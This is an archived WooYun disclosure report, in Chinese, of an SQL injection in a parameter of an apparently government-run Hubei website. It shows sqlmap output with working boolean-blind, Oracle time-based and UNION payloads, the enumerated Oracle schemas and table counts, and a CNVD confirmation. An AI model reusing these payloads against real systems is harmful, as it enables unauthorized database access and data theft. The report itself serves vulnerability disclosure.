乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-29: 细节已通知厂商并且等待厂商处理中 2015-12-03: 厂商已经确认,细节仅向厂商公开 2015-12-13: 细节向核心白帽子及相关领域专家公开 2015-12-23: 细节向普通白帽子公开 2016-01-02: 细节向实习白帽子公开 2016-01-17: 细节向公众公开
rt
http://**.**.**.**/hbwzweb/html/hdjl/zxzx/zxzx_ckhf.shtml?zxlb=01
http://**.**.**.**/hbwz/qtpage/hdjl/zxzx_info.jsp?id=20151005190032
sqlmap resumed the following injection point(s) from stored session:---Parameter: zxlb (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: zxlb=01%' AND 8183=8183 AND '%'=' Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: zxlb=01%' AND 5568=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(110)||CHR(89)||CHR(80),5) AND '%'=' Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: zxlb=-7752%' UNION ALL SELECT NULL,CHR(113)||CHR(113)||CHR(107)||CHR(98)||CHR(113)||CHR(107)||CHR(90)||CHR(116)||CHR(73)||CHR(89)||CHR(72)||CHR(102)||CHR(103)||CHR(106)||CHR(101)||CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113) FROM DUAL-----[22:53:49] [INFO] the back-end DBMS is Oracleweb server operating system: Windowsweb application technology: Apache 2.2.17back-end DBMS: Oracle[22:53:49] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpartto database names on other DBMSes[22:53:49] [INFO] fetching database (schema) names[22:53:49] [INFO] the SQL query used returns 24 entriesavailable databases [24]:[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_030000[*] FLOWS_FILES[*] HBWZ[*] HR[*] IX[*] MDSYS[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] SCOTT[*] SH[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WK_TEST[*] WKSYS[*] WMSYS[*] XDB
Database: SH+----------------------------+---------+| Table | Entries |+----------------------------+---------+| SALES | 918843 || COSTS | 82112 || CUSTOMERS | 55500 || FWEEK_PSCAT_SALES_MV | 11266 || SUPPLEMENTARY_DEMOGRAPHICS | 4500 || TIMES | 1826 || PROMOTIONS | 503 || PRODUCTS | 72 || CAL_MONTH_SALES_MV | 48 || COUNTRIES | 23 || DR$SUP_TEXT_IDX$R | 22 || CHANNELS | 5 |+----------------------------+---------+
危害等级:高
漏洞Rank:10
确认时间:2015-12-03 15:14
CNVD确认并复现所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置.
暂无